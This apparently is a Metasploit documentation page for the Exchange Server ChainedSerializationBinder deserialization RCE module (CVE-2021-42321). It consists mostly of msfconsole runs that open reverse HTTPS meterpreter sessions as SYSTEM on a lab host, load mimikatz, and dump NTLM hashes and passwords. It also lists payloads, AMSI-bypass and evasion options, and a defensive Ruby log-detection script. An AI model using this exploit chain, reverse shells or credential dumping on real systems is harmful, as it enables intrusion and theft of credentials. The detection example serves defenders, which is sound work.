msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set TARGET 1
TARGET => 1
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.31.160.218 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proc
ess, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.31.171.42 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
1 Windows Dropper
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Using URL: http://0.0.0.0:8080/QULKk6
[*] Local IP: http://172.31.171.42:8080/QULKk6
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7o
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Client 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268) requested /QULKk6
[*] Sending payload to 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268)
[*] Command Stager progress - 100.00% done (145/145 bytes)
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Redirecting stageless connection from /LLPgD_mj7kz9ZPxmn24Q9Qv80ANZ8PU38jaMQ3JCPiwWGPz3Gm6fNlGNzXZ9e_8y5xxnpC6a-JVHNcPmhyMpFnMCwvLNQeZRvnB9 with UA 'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Attaching orphaned/stageless session...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:02:25 -0600
[*] Server stopped.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username              Domain         NTLM                              SHA1                                      DPAPI
--------              ------         ----                              ----                                      -----
Administrator         TESTINGDOMAIN  373b765d01cd8aefea318e3843980454  220cface685ef2b97a998f965b0d9b996b55d560  c5c54fb2b86a1a4a85e6b23ad360777e
DC1$                  TESTINGDOMAIN  bc7047881521a2844573cd9b08cb33ed  1489def7ac6e5dd8eebf9d421549375da89bef2d
HealthMailbox25ad078  TESTINGDOMAIN  c9cd8580d9a519f7d3fe3b47e4e55f21  f5a89bd625da37ca3e9de89be8bba67e1b7d509b  c0f96c3c13864ffe1f6b62f2d0811bb1
ssp credentials
===============
Username                                                              Domain  Password
--------                                                              ------  --------
HealthMailbox25ad0782aada405eaaa7287c8c514daf@testingdomain.internal  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f>)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9oOeVGtzP=qPZ@9xT-uR)niraV42
wdigest credentials
===================
Username              Domain         Password
--------              ------         --------
(null)                (null)         (null)
Administrator         TESTINGDOMAIN  (null)
DC1$                  TESTINGDOMAIN  (null)
HealthMailbox25ad078  TESTINGDOMAIN  (null)
kerberos credentials
====================
Username              Domain                  Password
--------              ------                  --------
(null)                (null)                  (null)
Administrator         TESTINGDOMAIN.INTERNAL  (null)
DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 72 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50 ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0 33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 08 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6 88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 73 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e 61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2 e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 66 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29 9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 46 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e 25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8 83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 aa 3b f2 df ea c1 f6 77 a6 bb cb
HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
dc1$                  TESTINGDOMAIN.INTERNAL  (null)
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.31.160.218 - Meterpreter session 2 closed. Reason: User exit
Target 2 - PowerShell Stager
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
HttpPassword  thePassword123!  yes       The password to use to authenticate to the Exchange server
HttpUsername  administrator    yes       The username to log into the Exchange server as
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS        172.31.160.218   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         443              yes       The target port (TCP)
SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT       8080             yes       The local port to listen on.
SSL           true             no        Negotiate SSL/TLS for outgoing connections
SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI     /                yes       Base path
URIPATH                        no        The URI to use for this exploit (default is random)
VHOST                          no        HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_https):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     172.31.171.42    yes       The local listener hostname
LPORT     4444             yes       The local listener port
LURI                       no        The HTTP Path
Exploit target:
Id  Name
--  ----
2   PowerShell Stager
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7x
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
[*] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Staging x64 payload (201308 bytes) ...
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: urrkmn2k) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.31.171.42:4444 -> 127.0.0.1 ) at 2022-02-14 18:03:03 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username              Domain         NTLM                              SHA1                                      DPAPI
--------              ------         ----                              ----                                      -----
Administrator         TESTINGDOMAIN  373b765d01cd8aefea318e3843980454  220cface685ef2b97a998f965b0d9b996b55d560  c5c54fb2b86a1a4a85e6b23ad360777e
DC1$                  TESTINGDOMAIN  bc7047881521a2844573cd9b08cb33ed  1489def7ac6e5dd8eebf9d421549375da89bef2d
HealthMailbox25ad078  TESTINGDOMAIN  c9cd8580d9a519f7d3fe3b47e4e55f21  f5a89bd625da37ca3e9de89be8bba67e1b7d509b  c0f96c3c13864ffe1f6b62f2d0811bb1
ssp credentials
===============
Username                                                              Domain  Password
--------                                                              ------  --------
HealthMailbox25ad0782aada405eaaa7287c8c514daf@testingdomain.internal  (null)  5sYVnq4G=D1UacRrD(I-.hf&wQRe4DN_xn8I=G#JrD?B)-MWU$f>)Ojhaah_2a]9cuP)&YR_)71BnJ=@Tdhw8C^{RJ[(^Z;Z-X}F9oOeVGtzP=qPZ@9xT-uR)niraV42
wdigest credentials
===================
Username              Domain         Password
--------              ------         --------
(null)                (null)         (null)
Administrator         TESTINGDOMAIN  (null)
DC1$                  TESTINGDOMAIN  (null)
HealthMailbox25ad078  TESTINGDOMAIN  (null)
kerberos credentials
====================
Username              Domain                  Password
--------              ------                  --------
(null)                (null)                  (null)
Administrator         TESTINGDOMAIN.INTERNAL  (null)
DC1$                  testingdomain.internal  4d ce f7 a8 f4 e9 57 3e f2 7d fa 08 fd 44 72 d1 9d d2 7b ce 0c fd 86 cb 7c 6c a8 26 50 ea 21 c6 f2 b1 63 a8 67 ab 2f ac d8 0e b0 33 02 b1 6c f6 4f f6 3d 9d f1 55 e3 ee ef 08 d3 a9 96 e0 e4 d2 a2 1f 50 b0 8d 70 00 e6 88 1b a4 63 27 bf ed 60 3e 57 12 b2 25 ec b7 52 4f 01 e7 3c 93 0a ea 48 e5 2c 6d 18 73 80 c3 5f 2e cd 81 93 4e 81 52 32 e2 49 8e 61 63 ac 5e 72 59 f3 40 d5 be 2a cd ba a2 e4 f7 08 a6 af 1c 10 4f 79 4c 62 60 84 ad 66 9f 29 ae 03 2c b0 83 44 be 4b e8 64 1d 29 9b 8f 77 2c 92 5c 80 ca 93 d6 7c fe 1f 6b f6 48 52 22 62 14 ba ea 4b 7a 2b 69 98 60 46 43 8e 1f 22 87 a8 57 35 06 9e 6e 83 f1 9e 25 01 34 55 eb 93 a8 f9 65 ab 56 9e 7b b8 83 86 63 b4 e2 0a e9 a7 cb a0 34 89 35 72 aa 3b f2 df ea c1 f6 77 a6 bb cb
HealthMailbox25ad078  TESTINGDOMAIN.INTERNAL  (null)
dc1$                  TESTINGDOMAIN.INTERNAL  (null)
meterpreter >
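The console output in both scenarios above shows the EWS call sequence the module leaves behind on the server: the inbox folder is looked up, its user configuration object is deleted and re-created, and a GetClientAccessToken request then deserializes it (the module itself lists ioc-in-logs as a side effect). The following Ruby script is an added example, not part of this page or of the Metasploit module, that scans EWS protocol log rows for that chain from a defender's side. The log rows are constructed; the column names DateTime, AuthenticatedUser, ClientIpAddress and SoapAction are assumptions about the Exchange EWS log format, and the real log has many more columns, so rows are read by header name rather than by position.

```ruby
require 'csv'
require 'time'

# Constructed sample rows, not captured from a real server. The layout follows
# the Exchange EWS protocol log (CSV with a header row); the column names used
# here are assumed. The administrator rows reproduce the sequence seen in the
# console output above; alice and bob are benign/noise controls.
SAMPLE_EWS_LOG = <<~CSV
  DateTime,AuthenticatedUser,ClientIpAddress,SoapAction
  2022-02-14T18:02:10Z,TESTINGDOMAIN\\administrator,172.31.171.42,GetFolder
  2022-02-14T18:02:11Z,TESTINGDOMAIN\\administrator,172.31.171.42,DeleteUserConfiguration
  2022-02-14T18:02:12Z,TESTINGDOMAIN\\administrator,172.31.171.42,CreateUserConfiguration
  2022-02-14T18:02:13Z,TESTINGDOMAIN\\administrator,172.31.171.42,GetClientAccessToken
  2022-02-14T18:05:00Z,TESTINGDOMAIN\\alice,172.31.160.50,GetFolder
  2022-02-14T18:05:01Z,TESTINGDOMAIN\\alice,172.31.160.50,SyncFolderItems
  2022-02-14T17:00:00Z,TESTINGDOMAIN\\bob,172.31.160.51,CreateUserConfiguration
  2022-02-14T17:30:00Z,TESTINGDOMAIN\\bob,172.31.160.51,GetClientAccessToken
CSV

TRIGGER_ACTION = 'GetClientAccessToken'

# Returns one hash per suspicious chain: the same authenticated user, from the
# same client IP, issues CreateUserConfiguration and then GetClientAccessToken
# within window_seconds. Clients legitimately create user configuration objects
# (they hold per-folder settings), so the trigger call close behind the create
# is what sharpens the signal; a preceding DeleteUserConfiguration from the same
# pair is recorded as extra context.
def find_user_config_deserialization_chains(csv_text, window_seconds: 60)
  rows = CSV.parse(csv_text, headers: true).map do |r|
    { time: Time.iso8601(r['DateTime']), user: r['AuthenticatedUser'],
      ip: r['ClientIpAddress'], action: r['SoapAction'] }
  end

  findings = []
  # Group by (user, ip) and sort by time so the order of lines in the log
  # (which is not guaranteed) does not matter.
  rows.group_by { |r| [r[:user], r[:ip]] }.each do |(user, ip), events|
    events = events.sort_by { |e| e[:time] }
    events.each_with_index do |ev, i|
      next unless ev[:action] == 'CreateUserConfiguration'

      trigger = events.drop(i + 1).find do |later|
        later[:action] == TRIGGER_ACTION && later[:time] - ev[:time] <= window_seconds
      end
      next unless trigger

      findings << {
        user: user, ip: ip, create_at: ev[:time], trigger_at: trigger[:time],
        preceded_by_delete: events.take(i).any? { |e| e[:action] == 'DeleteUserConfiguration' }
      }
    end
  end
  findings
end

if $PROGRAM_NAME == __FILE__
  find_user_config_deserialization_chains(SAMPLE_EWS_LOG).each do |f|
    puts "#{f[:user]} from #{f[:ip]}: CreateUserConfiguration at #{f[:create_at]} " \
         "followed by GetClientAccessToken at #{f[:trigger_at]} " \
         "(DeleteUserConfiguration seen first: #{f[:preceded_by_delete]})"
  end
end
```

Only the administrator chain is reported with the default 60 second window; bob's create and trigger calls are thirty minutes apart and only show up if the window is widened, which is the knob to tune against your own baseline of GetClientAccessToken traffic (Outlook add-ins use it routinely).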
Msfconsole Usage
Here is how the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit module looks in the msfconsole:
msf6 > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] No payload configured, defaulting to cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show info
Name: Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE
Module: exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
Platform: Windows
Arch: cmd, x86, x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-12-09
Provided by:
pwnforsp
zcgonvh
Microsoft Threat Intelligence Center
Microsoft Security Response Center
peterjson
testanull
Grant Willcox
Module side effects:
ioc-in-logs
config-changes
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows Command
1 Windows Dropper
2 PowerShell Stager
Check supported:
Yes
Basic options:
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
HttpPassword                   yes       The password to use to authenticate to the Exchange server
HttpUsername                   yes       The username to log into the Exchange server as
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         443              yes       The target port (TCP)
SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT       8080             yes       The local port to listen on.
SSL           true             no        Negotiate SSL/TLS for outgoing connections
SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI     /                yes       Base path
URIPATH                        no        The URI to use for this exploit (default is random)
VHOST                          no        HTTP server virtual host
Payload information:
Description:
This vulnerability allows remote attackers to execute arbitrary code
on Exchange Server 2019 CU10 prior to Security Update 3, Exchange
Server 2019 CU11 prior to Security Update 2, Exchange Server 2016
CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior
to Security Update 2. Note that authentication is required to
exploit this vulnerability. The specific flaw exists due to the fact
that the deny list for the ChainedSerializationBinder had a typo
whereby an entry was typo'd as System.Security.ClaimsPrincipal
instead of the proper value of
System.Security.Claims.ClaimsPrincipal. By leveraging this
vulnerability, attacks can bypass the ChainedSerializationBinder's
deserialization deny list and execute code as NT AUTHORITY\SYSTEM.
Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,
and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-42321
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321
https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7
https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169
https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
Module Options
This is a complete list of options available in the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
HttpPassword                   yes       The password to use to authenticate to the Exchange server
HttpUsername                   yes       The username to log into the Exchange server as
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         443              yes       The target port (TCP)
SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT       8080             yes       The local port to listen on.
SSL           true             no        Negotiate SSL/TLS for outgoing connections
SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI     /                yes       Base path
URIPATH                        no        The URI to use for this exploit (default is random)
VHOST                          no        HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
LHOST         192.168.204.170  yes       The listen address (an interface may be specified)
LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
LPORT         4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Windows Command
Advanced Options
Here is a complete list of advanced options supported by the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show advanced
Module advanced options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name                                    Current Setting  Required  Description
----                                    ---------------  --------  -----------
AutoCheck                               true             no        Run check before exploit
CMDSTAGER::DECODER                                       no        The decoder stub to use.
CMDSTAGER::FLAVOR                       auto             no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_invokewebrequest)
CMDSTAGER::SSL                          false            no        Use SSL/TLS for supported stagers
CMDSTAGER::TEMP                                          no        Writable directory for staged files
ContextInformationFile                                   no        The information file that contains context information
DOMAIN                                  WORKSTATION      yes       The domain to use for Windows authentication
DigestAuthIIS                           true             no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler                   false            no        Disable the handler code for the selected payload
EXE::Custom                                              no        Use custom exe instead of automatically generating a payload exe
EXE::EICAR                              false            no        Generate an EICAR file instead of regular payload exe
EXE::FallBack                           false            no        Use the default template in case the specified one is missing
EXE::Inject                             false            no        Set to preserve the original EXE function
EXE::OldMethod                          false            no        Set to use the substitution EXE generation method.
EXE::Path                                                no        The directory in which to look for the executable template
EXE::Template                                            no        The executable template file name.
EnableContextEncoding                   false            no        Use transient context when encoding payloads
FingerprintCheck                        true             no        Conduct a pre-exploit fingerprint verification
ForceExploit                            false            no        Override check result
HttpClientTimeout                       5                no        HTTP connection and receive timeout
HttpRawHeaders                                           no        Path to ERB-templatized raw headers to append to existing headers
HttpTrace                               false            no        Show the raw HTTP requests and responses
HttpTraceColors                         red/blu          no        HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly                    false            no        Show HTTP headers only in HttpTrace
ListenerComm                                             no        The specific communication channel to use for this service
MSI::Custom                                              no        Use custom msi instead of automatically generating a payload msi
MSI::EICAR                              false            no        Generate an EICAR file instead of regular payload msi
MSI::Path                                                no        The directory in which to look for the msi template
MSI::Template                                            no        The msi template file name
MSI::UAC                                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
Powershell::encode_final_payload        false            yes       Encode final payload for -EncodedCommand
Powershell::encode_inner_payload        false            yes       Encode inner payload for -EncodedCommand
Powershell::exec_in_place               false            yes       Produce PSH without executable wrapper
Powershell::exec_rc4                    false            yes       Encrypt PSH with RC4
Powershell::method                      reflection       yes       Payload delivery method (Accepted: net, reflection, old, msil)
Powershell::no_equals                   false            yes       Pad base64 until no "=" remains
Powershell::noninteractive              true             yes       Execute powershell without interaction
Powershell::persist                     false            yes       Run the payload in a loop
Powershell::prepend_protections_bypass  auto             yes       Prepend AMSI/SBL bypass (Accepted: auto, true, false)
Powershell::prepend_sleep                                no        Prepend seconds of sleep
Powershell::remove_comspec              false            yes       Produce script calling powershell directly
Powershell::strip_comments              true             yes       Strip comments
Powershell::strip_whitespace            false            yes       Strip whitespace
Powershell::sub_funcs                   false            yes       Substitute function names
Powershell::sub_vars                    true             yes       Substitute variable names
Powershell::wrap_double_quotes          true             yes       Wraps the -Command argument in single quotes
SSLCipher                                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression                          false            no        Enable SSL/TLS-level compression
SSLVersion                              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots                              false            no        Return a robots.txt file if asked for one
URIHOST                                                  no        Host to use in URI (useful for tunnels)
URIPORT                                                  no        Port to use in URI (useful for tunnels)
UserAgent                               Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1  no  The User-Agent header to use for all requests
VERBOSE                                 false            no        Enable detailed status messages
WORKSPACE                                                no        Specify the workspace for this module
WfsDelay                                10               no        Additional delay in seconds to wait for a session
Payload advanced options (cmd/windows/powershell_reverse_tcp):
Name                        Current Setting  Required  Description
----                        ---------------  --------  -----------
ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
ReverseListenerComm                          no        The specific communication channel to use for this listener
ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
VERBOSE                     false            no        Enable detailed status messages
WORKSPACE                                    no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/http/exchange_chainedserializationbinder_denylist_typo_rce module can exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Command
1 Windows Dropper
2 PowerShell Stager
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit:
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/windows/adduser normal No Windows Execute net user /ADD CMD
1 payload/cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua)
2 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl)
3 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6
4 payload/cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby)
5 payload/cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS
6 payload/cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs)
7 payload/cmd/windows/generic normal No Windows Command, Generic Command Execution
8 payload/cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
9 payload/cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
10 payload/cmd/windows/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
11 payload/cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua)
12 payload/cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl)
13 payload/cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell)
14 payload/cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby)
15 payload/generic/custom normal No Custom Payload
16 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
17 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
18 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of evasion options supported by the windows/http/exchange_chainedserializationbinder_denylist_typo_rce exploit for evading defenses (e.g. antivirus, EDR, firewall, NIDS):
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show evasion
Module evasion options:
Name                          Current Setting  Required  Description
----                          ---------------  --------  -----------
